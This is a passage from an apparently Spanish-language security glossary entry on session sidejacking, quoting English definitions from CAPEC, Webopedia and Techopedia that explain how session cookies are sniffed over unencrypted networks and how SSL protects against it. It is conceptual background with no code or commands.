práctica
relacionada al Session hijacking, pero generalmente con el invasor y la víctima
en una misma red. Son muy frecuentes los ataques de este tipo en hotspots Wi-Fi
sin seguridad habilitada.
Session
sidejacking takes advantage of an unencrypted communication channel between a
victim and target system. The attacker sniffs traffic on a network looking for
session tokens in unencrypted traffic. Once a session token is captured, the
attacker performs malicious actions by using the stolen token with the targeted
application to impersonate the victim.
This attack is a
specific method of session hijacking, which is exploiting a valid session token
to gain unauthorized access to a target system or information. Other methods to
perform a session hijacking are session fixation, cross-site scripting, or
compromising a user or server machine and stealing the session token.
https://capec.mitre.org/data/definitions/
Term used to
describe the malicious act of hijacking an engaged Web session with a remote
service by intercepting and using the credentials that identified the
user/victim to that specific server. Typically, SideJacking is most common on
sites that require authentication through a username and password, such as
online Web mail accounts as well as social networking sites. SideJacking works
only if the site catches a non-SSL cookie, so any Web site that uses SSL
exclusively would be safe from SideJackers. SideJacking was first demonstrated
by Robert Graham, CEO of Errata Security at Black Hat in 2007.
http://www.webopedia.com/TERM/S/SideJacking.html
Sidejacking
refers to the use of unauthorized identification credentials to hijack a valid
Web session remotely in order to to take over a specific Web server. Usually
sidejacking attacks are performed through accounts where the user types in
their username and password. Sidejacking attacks work to find a nonsecure
sockets layer (SSL) cookie. Usually, websites that have users type in their
usernames and passwords are the type that get sidejacked. Websites that use
SSLs dont have as much of a chance of being sidejacked, but if the webmasters
neglect to authenticate the site itself through encryption, SSL use can be
negated. Unsecured Wi-Fi hot spots are also vulnerable.
http://www.techopedia.com/definition/4105/sidejacking
Temas relacionados